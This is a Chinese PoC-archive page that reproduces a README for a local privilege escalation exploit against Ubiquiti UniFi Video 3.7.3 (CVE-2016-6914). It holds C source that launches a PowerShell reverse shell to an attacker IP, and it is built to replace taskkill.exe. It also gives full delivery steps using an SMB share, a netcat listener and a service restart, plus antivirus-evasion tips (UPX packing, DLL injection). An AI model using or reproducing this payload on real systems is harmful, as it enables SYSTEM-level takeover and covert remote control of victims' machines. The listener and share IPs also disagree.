POC详情: 157d840a131abd2b63a60c7d9a8026b0596f63a6

来源
关联漏洞
标题: Ubiquiti UniFi Video for Windows 权限许可和访问控制问题漏洞 (CVE-2016-6914)
描述:Ubiquiti UniFi Video for Windows是美国Ubiquiti Networks公司的一款基于Windows平台的网络摄像机产品。 基于Windows平台的Ubiquiti UniFi Video 3.8.0之前的版本中存在安全漏洞,该漏洞源于程序为安装路径分配了较弱的权限。本地攻击者可借助恶意的taskkill.exe文件利用该漏洞获取SYSTEM权限。
描述
CVE-2016-6914-UniFiVideo-LPE
介绍

# CVE-2016-6914 - Ubiquiti UniFi Video 3.7.3 LPE PoC

## 🔥 Overview
This repository contains a **proof-of-concept (PoC)** for **CVE-2016-6914**, a **Local Privilege Escalation (LPE)** vulnerability affecting **Ubiquiti UniFi Video 3.7.3**.  

An attacker with **low privileges** can replace a **trusted binary** (`taskkill.exe`) inside `C:\ProgramData\unifi-video\` to execute **malicious code with SYSTEM privileges**.

---

## ⚡ Exploitation
### **Steps to Exploit**
1️⃣ Replace `taskkill.exe` with a **malicious payload** (`exploit.exe`).  
2️⃣ Wait for **UniFi Video Service** to run or manually restart it.  
3️⃣ The **malicious payload executes**, giving a **SYSTEM shell**.  

---

## 🚀 Payloads Included
- ✅ **PowerShell Reverse Shell**
- ✅ **Netcat Reverse Shell**
- ✅ **AV Bypass Techniques**

---

## 📜 PoC Code (PowerShell Reverse Shell)
This payload replaces `taskkill.exe` and launches a **reverse shell**.

```c
#include <windows.h>

int main() {
    system("powershell -NoP -W Hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\"");
    return 0;
}
✅ Compile using MinGW:
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe
🛠️ Usage Instructions
1️⃣ Set Up SMB Share (for Remote File Delivery)
On Kali, run:
impacket-smbserver share . -smb2support
2️⃣ Start Netcat Listener
nc -lvnp 4444
3️⃣ Deliver Payload to Target Machine
Run the following PowerShell commands on the target system:
copy \\10.10.14.5\share\taskkill.exe C:\ProgramData\unifi-video\taskkill.exe
stop-service UnifiVideoService -Force
start-service UnifiVideoService
4️⃣ Get SYSTEM Shell
Once executed, a SYSTEM shell is opened on your listener!

🛡️ Bypassing Antivirus (AV)
To evade basic AV detection, try: ✔️ Packing Executable (UPX):
upx --best --lzma exploit.exe
✔️ Using Alternative Syscalls instead of system().
✔️ Embedding in Legitimate Processes using DLL Injection.

⚠️ Disclaimer
📢 This PoC is for educational purposes only!
🛑 Unauthorized use is illegal and punishable.
👨‍💻 Use it only in a legal and ethical manner.

Reference:https://www.exploit-db.com/exploits/43390
文件快照

[4.0K] /data/pocs/157d840a131abd2b63a60c7d9a8026b0596f63a6 ├── [ 600] exploit.c ├── [111K] exploit.exe └── [2.5K] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。